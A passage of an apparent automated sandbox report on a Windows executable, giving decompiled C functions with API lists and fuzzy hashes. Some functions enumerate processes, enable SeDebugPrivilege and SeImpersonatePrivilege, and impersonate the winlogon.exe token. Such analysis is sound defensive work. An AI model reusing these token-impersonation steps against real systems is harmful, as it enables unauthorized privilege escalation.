                                                                                                                					 *_t17 = "GetModuleBaseNameW";
                                                                                                                					 *__esi = _t7;
                                                                                                                					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                                					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                					__esi[3] = _t12;
                                                                                                                					return _t12;
                                                                                                                				}
                                                                                                                				return _t6;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				void _v538;
                                                                                                                				long _v540;
                                                                                                                				void _v1066;
                                                                                                                				char _v1068;
                                                                                                                				long _t30;
                                                                                                                				int _t33;
                                                                                                                				int _t39;
                                                                                                                				void* _t42;
                                                                                                                				void* _t45;
                                                                                                                				long _t49;
                                                                                                                
                                                                                                                				_t45 = __edx;
                                                                                                                				_v540 = 0;
                                                                                                                				memset( &_v538, 0, 0x208);
                                                                                                                				_v1068 = 0;
                                                                                                                				memset( &_v1066, 0, 0x208);
                                                                                                                				E00404C3C( &_v540);
                                                                                                                				_t48 = L"winlogon.exe";
                                                                                                                				_t39 = wcslen(L"winlogon.exe");
                                                                                                                				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                                				_t53 = _t39 + _t8 - 0x104;
                                                                                                                				_pop(_t42);
                                                                                                                				if(_t39 + _t8 >= 0x104) {
                                                                                                                					_v1068 = 0;
                                                                                                                				} else {
                                                                                                                					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                                					_pop(_t42);
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                                				_t49 = _t30;
                                                                                                                				_t54 = _t49;
                                                                                                                				if(_t49 == 0) {
                                                                                                                					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                                					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                                					if(_t33 == 0) {
                                                                                                                						_t49 = GetLastError();
                                                                                                                					}
                                                                                                                					CloseHandle(_v8);
                                                                                                                				}
                                                                                                                				return _t49;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                				int _t8;
                                                                                                                				struct HINSTANCE__* _t9;
                                                                                                                
                                                                                                                				if( *0x41c8e8 == 0) {
                                                                                                                					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					if(_t9 != 0) {
                                                                                                                						 *0x41c8e8 = 1;
                                                                                                                						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *0x41c8ec == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                					return _t8;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402F31(void* _a4) {
                                                                                                                				void _v530;
                                                                                                                				long _v532;
                                                                                                                				void* __edi;
                                                                                                                				wchar_t* _t15;
                                                                                                                				intOrPtr _t18;
                                                                                                                				short* _t19;
                                                                                                                				void* _t22;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_v532 = _v532 & 0x00000000;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                                				if(_t15 != 0) {
                                                                                                                					 *_t15 =  *_t15 & 0x00000000;
                                                                                                                				}
                                                                                                                				wcscat( &_v532, L".cfg");
                                                                                                                				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                                				_t19 = _t18 + 0x5504;
                                                                                                                				_t36 =  *_t19;
                                                                                                                				_pop(_t29);
                                                                                                                				if( *_t19 != 0) {
                                                                                                                					E00404923(0x104,  &_v532, _t19);
                                                                                                                					_pop(_t29);
                                                                                                                				}
                                                                                                                				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
                                                                                                                				return _t22;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                				char _v16390;
                                                                                                                				short _v16392;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t37;
                                                                                                                
                                                                                                                				_t30 = __ecx;
                                                                                                                				E0040B550(0x4004, __ecx);
                                                                                                                				_push(0x4000);
                                                                                                                				_push(0);
                                                                                                                				_v16392 = 0;
                                                                                                                				_t34 = _t30;
                                                                                                                				_push( &_v16390);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					memset();
                                                                                                                					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t37 =  ~_t36;
                                                                                                                					E004051B8( &_v16392, _t34, _a16);
                                                                                                                				} else {
                                                                                                                					memset();
                                                                                                                					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                                					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                				signed int _t16;
                                                                                                                				void** _t21;
                                                                                                                				signed int _t22;
                                                                                                                
                                                                                                                				_t21 = __edi;
                                                                                                                				_t22 =  *__eax;
                                                                                                                				if(__edx < _t22) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t13 =  *__edi;
                                                                                                                					do {
                                                                                                                						_t1 =  &_a8; // 0x4057e1
                                                                                                                						 *__eax =  *__eax +  *_t1;
                                                                                                                						_t16 =  *__eax;
                                                                                                                					} while (__edx >= _t16);
                                                                                                                					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                					 *__edi = _t8;
                                                                                                                					if(_t22 > 0) {
                                                                                                                						if(_t8 != 0) {
                                                                                                                							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                						}
                                                                                                                						free(_t13); // executed
                                                                                                                					}
                                                                                                                					return 0 |  *_t21 != 0x00000000;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
                                                                                                                				void _v2050;
                                                                                                                				signed short _v2052;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                				WCHAR* _t18;
                                                                                                                
                                                                                                                				_v2052 = _v2052 & 0x00000000;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				E00404C3C( &_v2052);
                                                                                                                				_t18 =  &_v2052;
                                                                                                                				E004047AF(_t18);
                                                                                                                				wcscat(_t18, _a4);
                                                                                                                				_t16 = LoadLibraryW(_t18); // executed
                                                                                                                				if(_t16 == 0) {
                                                                                                                					return LoadLibraryW(_a4);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                  • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                  • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                  • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                                				_t13 = _t8;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					FreeLibrary(_v8);
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t6;
                                                                                                                				void* _t8;
                                                                                                                				struct HINSTANCE__** _t10;
                                                                                                                
                                                                                                                				_t10 = __eax;
                                                                                                                				E00409921(__eax);
                                                                                                                				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                				if(_t6 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                				return _t8;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t3;
                                                                                                                				signed int* _t7;
                                                                                                                
                                                                                                                				_t7 = __edi;
                                                                                                                				_t3 =  *__edi;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					FreeLibrary(_t3); // executed
                                                                                                                					 *__edi =  *__edi & 0x00000000;
                                                                                                                				}
                                                                                                                				E004099D4( &(_t7[0xa]));
                                                                                                                				return E004099D4( &(_t7[6]));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
